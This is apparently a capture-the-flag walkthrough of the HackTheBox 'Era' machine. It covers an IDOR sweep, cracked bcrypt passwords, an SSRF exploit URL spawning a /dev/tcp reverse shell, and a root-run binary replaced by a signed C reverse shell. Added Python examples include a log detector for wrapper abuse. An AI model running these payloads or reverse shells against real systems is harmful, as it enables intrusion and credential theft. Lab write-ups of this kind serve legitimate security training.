HackTheBox Era Walkthrough

insidepwn
6 min read
💡 To all those who got stuck at FTP: don't worry, I've got you covered.

Initial Enumeration

  • Nmap did not turn up anything unusual.

  • Add era.htb to /etc/hosts.

Foothold and user.txt

  • I didn't find much on the main website, so I moved on to subdomain enumeration

  • and found one using ffuf (filtering out the 154-byte response the server returns for unknown vhosts):

└─$ ffuf -w /path/to/top100ksubdomain.txt -H  "Host: FUZZ.era.htb" -u http://era.htb -t 200 -fs 154

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://era.htb
 :: Wordlist         : FUZZ: /path/to/top100ksubdomain.txt
 :: Header           : Host: FUZZ.era.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 200
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 154
________________________________________________

file                    [Status: 200, Size: 6765, Words: 2608, Lines: 234, Duration: 105ms]
:: Progress: [100000/100000] :: Job [1/1] :: 1886 req/sec :: Duration: [0:00:56] :: Errors: 0 ::

Link to wordlist here

  • Add file.era.htb to /etc/hosts as well.

  • The site at file.era.htb did not reveal anything on its own, so I ran directory enumeration (excluding the 6765-byte default response and adding the .php extension):
└─$ gobuster dir -u http://file.era.htb/ -w /usr/share/wordlists/dirb/common.txt -t 50 --exclude-length 6765 -x php
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://file.era.htb/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] Exclude Length:          6765
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd            (Status: 403) [Size: 162]
/.htaccess            (Status: 403) [Size: 162]
/.hta                 (Status: 403) [Size: 162]
/assets               (Status: 301) [Size: 178] [--> http://file.era.htb/assets/]
/download.php         (Status: 302) [Size: 0] [--> login.php]
/files                (Status: 301) [Size: 178] [--> http://file.era.htb/files/]
/images               (Status: 301) [Size: 178] [--> http://file.era.htb/images/]
/layout.php           (Status: 200) [Size: 0]
/LICENSE              (Status: 200) [Size: 34524]
/login.php            (Status: 200) [Size: 9214]
/logout.php           (Status: 200) [Size: 70]
/manage.php           (Status: 302) [Size: 0] [--> login.php]
/register.php         (Status: 200) [Size: 3205]
/upload.php           (Status: 302) [Size: 0] [--> login.php]
Progress: 9228 / 9230 (99.98%)
===============================================================
Finished
===============================================================
  • I registered a user at register.php and uploaded a file through upload.php. The id parameter used to fetch the file back is a plain sequential number with no ownership check, i.e. an IDOR.

  • I enumerated the id parameter with Burp Suite Intruder.

  • Link to wordlist here

  • Two ids, 54 and 150, returned files.
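
An IDOR sweep of the id parameter, added here as an example; it is not code from the walkthrough or from the box. It does what the Burp Intruder run above does: request every id and keep the ones whose response differs from a known-miss baseline (the same trick as ffuf's -fs). Assumed: download.php?id=N&show=true is the endpoint, a logged-in PHPSESSID cookie is available, and BASELINE_ID does not exist. The FAKE_SERVER table is a constructed stand-in so the sweep can run offline.

```python
"""IDOR sweep of download.php's id parameter (added example, not from the walkthrough).

Assumptions: endpoint is download.php?id=N&show=true, a logged-in PHPSESSID cookie is
available, and BASELINE_ID does not correspond to any file.
"""
import sys
import urllib.error
import urllib.request
from typing import Callable, Dict, Iterable, Tuple

Resp = Tuple[int, int]          # (HTTP status, body length)
BASELINE_ID = 10 ** 6           # assumption: no file has this id


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Surface a 302 -> login.php as a response instead of following it to the login page."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def http_fetcher(base_url: str, phpsessid: str) -> Callable[[int], Resp]:
    """Build a fetch(id) -> (status, size) function bound to one logged-in session."""
    opener = urllib.request.build_opener(_NoRedirect)

    def fetch(file_id: int) -> Resp:
        req = urllib.request.Request(
            f"{base_url}/download.php?id={file_id}&show=true",
            headers={"Cookie": f"PHPSESSID={phpsessid}"})
        try:
            with opener.open(req, timeout=10) as r:
                return r.status, len(r.read())
        except urllib.error.HTTPError as e:   # 3xx/4xx/5xx responses still carry a body
            return e.code, len(e.read())
    return fetch


def find_hits(fetch: Callable[[int], Resp], ids: Iterable[int], baseline: Resp) -> Dict[int, Resp]:
    """Return {id: (status, size)} for every id whose response is not the baseline miss."""
    hits: Dict[int, Resp] = {}
    for i in ids:
        resp = fetch(i)
        if resp != baseline:
            hits[i] = resp
    return hits


def enumerate_ids(fetch: Callable[[int], Resp], first: int, last: int) -> Tuple[Resp, Dict[int, Resp]]:
    """Measure the miss baseline from a non-existent id, then sweep first..last inclusive."""
    baseline = fetch(BASELINE_ID)
    return baseline, find_hits(fetch, range(first, last + 1), baseline)


# Constructed stand-in for the server: ids 54 and 150 exist, everything else is an empty 200.
FAKE_SERVER = {54: (200, 27011), 150: (200, 3120)}
MISS = (200, 0)


def fake_fetch(file_id: int) -> Resp:
    return FAKE_SERVER.get(file_id, MISS)


def demo() -> Tuple[Resp, Dict[int, Resp]]:
    """Offline run against the constructed server."""
    return enumerate_ids(fake_fetch, 1, 200)


if __name__ == "__main__":
    if len(sys.argv) == 2:   # python3 idor_sweep.py <PHPSESSID>  -> live sweep of file.era.htb
        baseline, hits = enumerate_ids(http_fetcher("http://file.era.htb", sys.argv[1]), 1, 300)
    else:
        baseline, hits = demo()
    print("baseline:", baseline)
    for i, (status, size) in sorted(hits.items()):
        print(f"id={i} status={status} size={size}")
```

Measuring the baseline from a deliberately bad id rather than hard-coding a size keeps the sweep honest when the application changes its "not found" page; the redirect handler matters because otherwise urllib would silently follow the 302 to login.php and every id would look like a hit.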

  • I extracted site-backup-30-08-24.zip (id 54, as the database itself confirms), found a database called filedb.sqlite inside and dumped it:
└─$ sqlite3 filedb.sqlite 
SQLite version 3.46.1 2024-08-13 09:16:08
Enter ".help" for usage hints.
sqlite> .dump
PRAGMA foreign_keys=OFF;
BEGIN TRANSACTION;
CREATE TABLE files (
        fileid int NOT NULL PRIMARY KEY,
        filepath varchar(255) NOT NULL,
        fileowner int NOT NULL,
        filedate timestamp NOT NULL
        );
INSERT INTO files VALUES(54,'files/site-backup-30-08-24.zip',1,1725044282);
CREATE TABLE users (
        user_id INTEGER PRIMARY KEY AUTOINCREMENT,
        user_name varchar(255) NOT NULL,
        user_password varchar(255) NOT NULL,
        auto_delete_files_after int NOT NULL
        , security_answer1 varchar(255), security_answer2 varchar(255), security_answer3 varchar(255));
INSERT INTO users VALUES(1,'admin_ef01cab31aa','$2y$10$wDbohsUaezf74d3sMNRPi.o93wDxJqphM2m0VVUp41If6WrYr.QPC',600,'Maria','Oliver','Ottawa');
INSERT INTO users VALUES(2,'eric','$2y$10$S9EOSDqF1RzNUvyVj7OtJ.mskgP1spN3g2dneU.D.ABQLhSV2Qvxm',-1,NULL,NULL,NULL);
INSERT INTO users VALUES(3,'veronica','$2y$10$xQmS7JL8UT4B3jAYK7jsNeZ4I.YqaFFnZNA/2GCxLveQ805kuQGOK',-1,NULL,NULL,NULL);
INSERT INTO users VALUES(4,'yuri','$2b$12$HkRKUdjjOdf2WuTXovkHIOXwVDfSrgCqqHPpE37uWejRqUWqwEL2.',-1,NULL,NULL,NULL);
INSERT INTO users VALUES(5,'john','$2a$10$iccCEz6.5.W2p7CSBOr3ReaOqyNmINMH1LaqeQaL22a1T1V/IddE6',-1,NULL,NULL,NULL);
INSERT INTO users VALUES(6,'ethan','$2a$10$PkV/LAd07ftxVzBHhrpgcOwD3G1omX4Dk2Y56Tv9DpuUV/dh/a1wC',-1,NULL,NULL,NULL);
DELETE FROM sqlite_sequence;
INSERT INTO sqlite_sequence VALUES('users',16);
COMMIT;
sqlite>
  • The dump gives us six users: admin_ef01cab31aa and five regular users. Next we try to crack the bcrypt hashes; only eric's and yuri's fell to the wordlist:
eric:$2y$10$S9EOSDqF1RzNUvyVj7OtJ.mskgP1spN3g2dneU.D.ABQLhSV2Qvxm
yuri:$2b$12$HkRKUdjjOdf2WuTXovkHIOXwVDfSrgCqqHPpE37uWejRqUWqwEL2.
  • Cracking them with john and the rockyou wordlist:
└─$ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (bcrypt [Blowfish 32/64 X3])
No password hashes left to crack (see FAQ)

└─$ john --show hash.txt                                     
eric:america
yuri:mustang

2 password hashes cracked, 0 left
  • I logged into the FTP service as yuri (eric's credentials were not accepted there) but found nothing useful.

  • I then reviewed the source code from the site-backup zip and found a vulnerability in download.php.

  • The vulnerability is in the "beta" functionality of download.php, which is only available to admin_ef01cab31aa. The user-supplied format parameter is passed straight to a PHP stream function without any validation, so it can name an arbitrary stream wrapper. That is a Server-Side Request Forgery (SSRF) against internal resources, and with the ssh2.exec:// wrapper it becomes command execution: the server opens an SSH session to a host of our choosing and runs the command we specify.

  • The beta feature requires being logged in as admin_ef01cab31aa, so we first take over that account. The reset functionality at http://file.era.htb/reset.php lets us, from the user account we registered, change the admin's security questions and then reset the admin password with the answers we set. (The dump above also lists the admin's current answers: Maria, Oliver, Ottawa.)

  • To get RCE, open the following URL in the browser while logged in as the admin, after replacing <YOUR_IP> with your own address. The ssh2.exec wrapper makes the web server SSH into 127.0.0.1 as yuri with the cracked password and run the reverse shell there, which is why the shell comes back as yuri rather than as the web server user.
http://file.era.htb/download.php?id=54&show=true&format=ssh2.exec://yuri:mustang@127.0.0.1/bash%20-c%20"bash%20-i%20>%26%20%2Fdev%2Ftcp%2F<YOUR_IP>%2F4444%200%3E%261%22;
  • On your local machine, start the listener before sending the request; the connection comes back as yuri:
โ””โ”€$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.xx.xx] from (UNKNOWN) [10.10.11.79] 43046
bash: cannot set terminal process group (4983): Inappropriate ioctl for device
bash: no job control in this shell
yuri@era:~$ python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
yuri@era:~$ su eric
su eric
Password: america
  • With the shell upgraded to a PTY, switch to eric using the cracked password and read user.txt.
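
Two checks related to the download.php bug, added here as an example (not code from the original walkthrough or from the box): a server-side validation of the format parameter that would have closed the hole, and a small detector that flags PHP stream-wrapper abuse in Apache access logs. The detector runs over constructed sample lines, one of them shaped like the exploit URL above. The allowlist values are hypothetical, since the page does not show which format values download.php legitimately accepts.

```python
"""Hardening and detection for the download.php "format" stream-wrapper bug.

Added example, not code from the box. ALLOWED_FORMATS and SAMPLE_LOG are constructed.
"""
import re
from urllib.parse import unquote

# Hypothetical allowlist: the legitimate format values of the real download.php are not known.
ALLOWED_FORMATS = {"raw", "zip"}


def validate_format(value: str) -> str:
    """Server-side fix: accept only a bare allowlisted token.

    A scheme, a path or any wrapper syntax is rejected outright, so user input never
    reaches a PHP stream function as a URL."""
    if value in ALLOWED_FORMATS:
        return value
    raise ValueError(f"format not allowed: {value!r}")


# PHP stream wrappers that deserve an alert when they show up in a query string.
PHP_WRAPPERS = {"php", "phar", "data", "expect", "glob", "file", "ftp", "ftps", "zip",
                "compress.zlib", "compress.bzip2", "ssh2.shell", "ssh2.exec",
                "ssh2.tunnel", "ssh2.sftp", "ssh2.scp"}
SCHEME_RE = re.compile(r"^([a-z][a-z0-9+.\-]*)://", re.I)
REQ_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')


def query_params(target: str) -> dict:
    """Split the query string by hand so a '&' or ';' hidden inside a %-encoded value
    cannot truncate it (parse_qs's separator handling differs across Python versions)."""
    params = {}
    if "?" not in target:
        return params
    for pair in target.split("?", 1)[1].split("&"):
        key, _, val = pair.partition("=")
        params[unquote(key)] = unquote(val)
    return params


def classify_format(value: str):
    """Return (scheme, severity) when the value carries a URL scheme, else None.
    A bare token like 'zip' is what the application expects; any scheme is wrong."""
    m = SCHEME_RE.match(value)
    if not m:
        return None
    scheme = m.group(1).lower()
    return scheme, ("high" if scheme in PHP_WRAPPERS else "medium")


def redact(value: str) -> str:
    """Strip user:pass@ from a wrapper URL so credentials do not land in the alert."""
    return re.sub(r"://[^/@\s]+@", "://<redacted>@", value)


def scan_access_log(lines):
    """Run the check over Apache combined-format lines; return one alert dict per hit."""
    alerts = []
    for line in lines:
        m = REQ_RE.match(line)
        if not m:
            continue
        fmt = query_params(m.group("target")).get("format")
        if fmt is None:
            continue
        hit = classify_format(fmt)
        if hit:
            scheme, severity = hit
            alerts.append({"ip": m.group("ip"), "scheme": scheme, "severity": severity,
                           "status": int(m.group("status")), "format": redact(fmt)})
    return alerts


# Constructed sample lines (Apache combined format), not real server logs.
SAMPLE_LOG = [
    '10.10.14.5 - - [01/Sep/2024:05:05:01 +0000] "GET /download.php?id=54&show=true&format=zip HTTP/1.1" 200 27011 "-" "Mozilla/5.0"',
    '10.10.14.5 - - [01/Sep/2024:05:05:09 +0000] "GET /download.php?id=54&show=true&format=ssh2.exec://yuri:mustang@127.0.0.1/bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.14.5%2F4444%200%3E%261%22; HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '10.10.14.5 - - [01/Sep/2024:05:05:12 +0000] "GET /download.php?id=54&show=true&format=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 512 "-" "curl/8.0"',
    '10.10.14.6 - - [01/Sep/2024:05:06:00 +0000] "GET /login.php HTTP/1.1" 200 9214 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for alert in scan_access_log(SAMPLE_LOG):
        print(alert)
```

The allowlist is the right shape of fix because the parameter is supposed to select among a handful of output formats, not describe a location; a denylist of wrapper names would miss whichever wrapper the next PHP extension adds. The detector's redaction step matters in practice: the exploit URL carries yuri's password in clear, and an alert that copies it into a SIEM just spreads the credential further.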

Privilege Escalation and root.txt

  • For root I ran linpeas, which pointed at a binary called monitor running under root:

eric@era:~$ ps aux | grep root 
root        7540  0.0  0.0   2892   968 ?        Ss   05:05   0:00 /bin/sh -c bash -c '/root/initiate_monitoring.sh' >> /opt/AV/periodic-checks/status.log 2>&1
root        7541  0.0  0.0   4784  3412 ?        S    05:05   0:00 /bin/bash /root/initiate_monitoring.sh
root        7551  0.0  0.0   2776   964 ?        S    05:05   0:00 /opt/AV/periodic-checks/monitor
  • The ps output shows monitor being launched as root by /root/initiate_monitoring.sh, with its output appended to /opt/AV/periodic-checks/status.log.
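
A triage helper, added here as an example rather than something from the walkthrough or the box: given ps output, it lists the paths used by root processes that the current user could tamper with, and distinguishes a writable file from a writable parent directory. The second case is the one the rm/mv swap further down relies on: a directory we can write lets us remove and replace a root-owned 755 binary even though the file itself is not writable. The ps lines are the ones shown above; the writability map is constructed (only /opt/AV/periodic-checks marked writable), matching what the later steps imply, while the live mode uses os.access on the real system.

```python
"""Which paths used by root processes can the current user tamper with?

Added example, not from the walkthrough. DEMO_WRITABLE is constructed; the live mode
(run the file directly) checks real permissions with os.access.
"""
import os
import shlex
from typing import Callable, Dict, Iterable, List, Tuple

# Shell/interpreter binaries are not interesting targets themselves; the scripts they run are.
INTERPRETERS = {"/bin/sh", "/bin/bash", "/usr/bin/sh", "/usr/bin/bash", "/usr/bin/python3", "/usr/bin/perl"}


def parse_ps_aux(lines: Iterable[str]) -> List[Tuple[str, int, str]]:
    """Yield (user, pid, command) from `ps aux` output, skipping the header line."""
    rows = []
    for line in lines:
        parts = line.split(None, 10)          # USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
        if len(parts) < 11 or parts[0] == "USER":
            continue
        rows.append((parts[0], int(parts[1]), parts[10]))
    return rows


def candidate_paths(command: str) -> List[str]:
    """Absolute paths named on a command line, with quotes removed and interpreters skipped."""
    try:
        tokens = shlex.split(command)
    except ValueError:                        # unbalanced quotes: fall back to a plain split
        tokens = command.split()
    paths: List[str] = []
    for tok in tokens:
        tok = tok.strip("'\"")
        if tok.startswith("/") and tok not in INTERPRETERS and tok not in paths:
            paths.append(tok)
    return paths


def tamperable(ps_lines: Iterable[str], writable: Callable[[str], bool]) -> Dict[str, str]:
    """Return {path: reason} for paths used by root processes that `writable` says we can alter.

    A writable parent directory is reported separately: it allows rm + rename of a
    root-owned binary even when the file mode itself forbids writing."""
    findings: Dict[str, str] = {}
    for user, _pid, cmd in parse_ps_aux(ps_lines):
        if user != "root":
            continue
        for path in candidate_paths(cmd):
            if writable(path):
                findings[path] = "file writable: overwrite in place"
            elif writable(os.path.dirname(path)):
                findings[path] = "directory writable: rm + replace (rename) works"
    return findings


# The ps lines quoted in the walkthrough.
PS_FROM_PAGE = [
    "root        7540  0.0  0.0   2892   968 ?        Ss   05:05   0:00 /bin/sh -c bash -c '/root/initiate_monitoring.sh' >> /opt/AV/periodic-checks/status.log 2>&1",
    "root        7541  0.0  0.0   4784  3412 ?        S    05:05   0:00 /bin/bash /root/initiate_monitoring.sh",
    "root        7551  0.0  0.0   2776   964 ?        S    05:05   0:00 /opt/AV/periodic-checks/monitor",
]
# Constructed: only the periodic-checks directory is writable by our user, as the rm/mv steps imply.
DEMO_WRITABLE = {"/opt/AV/periodic-checks": True}


def demo() -> Dict[str, str]:
    """Offline run over the page's ps lines with the constructed permission map."""
    return tamperable(PS_FROM_PAGE, lambda p: DEMO_WRITABLE.get(p, False))


if __name__ == "__main__":
    live = tamperable(os.popen("ps aux").read().splitlines(), lambda p: os.access(p, os.W_OK))
    for path, why in (live or demo()).items():
        print(f"{path}: {why}")
```

The same directory-versus-file distinction is what `ls -ld /opt/AV/periodic-checks` tells you by hand; the helper just applies it to every path a root process touches, including log files, which are worth a look in their own right when the writer runs as root.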

  • To exploit this we build a malicious replacement for monitor and put it in place of the original. The replacement has to be signed as well, using the key we obtained from signing.zip.

  • On your local machine, create exploit.c and compile it statically, so it has no runtime dependencies on the target:

└─$ cat exploit.c         
#include <unistd.h>

/* Runs as root when the monitoring script executes it, so setuid/setgid(0) are
 * effectively no-ops here; they are kept so the shell is root even if the file is
 * ever launched with only a saved root uid. The command spawns a reverse shell to
 * <YOUR_IP>:1337. */
int main(void) {
    setuid(0); setgid(0);
    execl("/bin/bash", "bash", "-c", "bash -i >& /dev/tcp/<YOUR_IP>/1337 0>&1", (char *)NULL);
    return 0;
}
โ””โ”€$ x86_64-linux-gnu-gcc -o monitor exploit.c -static

โ””โ”€$ file monitor    
monitor: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, BuildID[sha1]=5aee64d06999616a92857d433be5d85a5af4a5e5, for GNU/Linux 3.2.0, not stripped
  • To sign it, build the elf-sign tool from linux-elf-binary-signer and sign the binary's .text section with the key from signing.zip (key.pem):
git clone https://github.com/NUAA-WatchDog/linux-elf-binary-signer.git
cd linux-elf-binary-signer
make clean
gcc -o elf-sign elf_sign.c -lssl -lcrypto -Wno-deprecated-declarations
└─$ ./elf-sign sha256 key.pem key.pem monitor
 --- 64-bit ELF file, version 1 (CURRENT), little endian.
 --- 26 sections detected.
 --- Section 0006 [.text] detected.
 --- Length of section [.text]: 480697
 --- Signature size of [.text]: 458
 --- Writing signature to file: .text_sig
 --- Removing temporary signature file: .text_sig
└─$ mv monitor monitor.1
  • Serve the signed binary from your machine (for example python3 -m http.server 8000) and fetch it into /opt/AV/periodic-checks from eric's shell. This only works because eric can write to that directory (check with ls -ld /opt/AV/periodic-checks); the rm and mv below rely on directory write access, not on write access to the original binary.

  • In eric's shell:

wget http://<YOUR_IP>:8000/monitor.1
rm monitor
mv monitor.1 monitor
chmod +x monitor
  • On your local machine, have a listener ready on 1337; the next run of the monitoring job executes our binary and connects back as root:
โ””โ”€$ nc -lnvp 1337                 
listening on [any] 1337 ...
connect to [10.10.xx.xx] from (UNKNOWN) [10.10.11.79] 55440
bash: cannot set terminal process group (8204): Inappropriate ioctl for device
bash: no job control in this shell
root@era:~#

That is it for this machine. Hope you enjoyed solving it.

Thanks for reading the walkthrough. Hope you liked it! Do leave a comment for feedback or queries!
